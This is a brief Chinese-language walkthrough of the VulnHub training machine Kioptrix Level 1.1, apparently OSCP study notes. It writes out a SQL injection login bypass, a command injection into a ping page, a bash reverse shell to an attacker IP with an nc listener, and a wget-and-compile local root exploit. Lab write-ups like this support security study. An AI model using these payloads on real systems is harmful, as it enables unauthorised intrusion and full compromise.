# Target complete - Kioptrix: Level 1.1 Download URL: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ ## Step: {%hackmd FEwWUB_uQXiEWEj9MsaEgA %} 3. 找到有 80 port ,打開頁面是輸入帳密的地方 * 用 sql inject 測看看 `'OR 1=1 --` 或是`' or '5'='5)` * ![](https://i.imgur.com/800daDO.png) 4. 接著是一個 ping 的頁面,所以聯想到 Command-Injection,使用 `; ls` 5. 利用 reverse shell * 在攻擊端 kail 上,輸入 `nc -lvp 4444` * 在被攻擊端的那個頁面輸入 `;bash -i >&/dev/tcp/172.20.10.4/4444 0>&1` ![](https://i.imgur.com/UFJm1Oa.png) 6. 身份是 apache,因此看能不能提權 * uname -r ,發現是 linux 2.6 版 * lsb_release -a 是 centos 4.5 版 * google 搜尋 centos 4.5 privilege escalation ![](https://i.imgur.com/ZRWzrkR.png) * 9545 這個符合我們的版本,下載至 kali 機器,此時 kali 的這台 apache2 service 要先 start,因為靶機無法 wget * 因為靶機只有 /tmp 有權限,所以到 /tmp 底下 wget kali 上剛下載的檔案 * gcc 9545.c * ./a.out * 身份已變為 root 7. ![](https://i.imgur.com/Y87RTTA.png) # Writeup 參考: * https://lonelysec.com/vulnhub-x-kioptrix-level-1-1-2/ * https://mks.tw/3035/%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8-vulnhub-kioptrix-level-2-%E8%A7%A3%E9%A1%8C%E7%B4%80%E9%8C%84 * https://hackercat.org/vulnhub/vulnhub-kioptrix-level-1-2-walkthrough ###### tags: `target` `OSCP`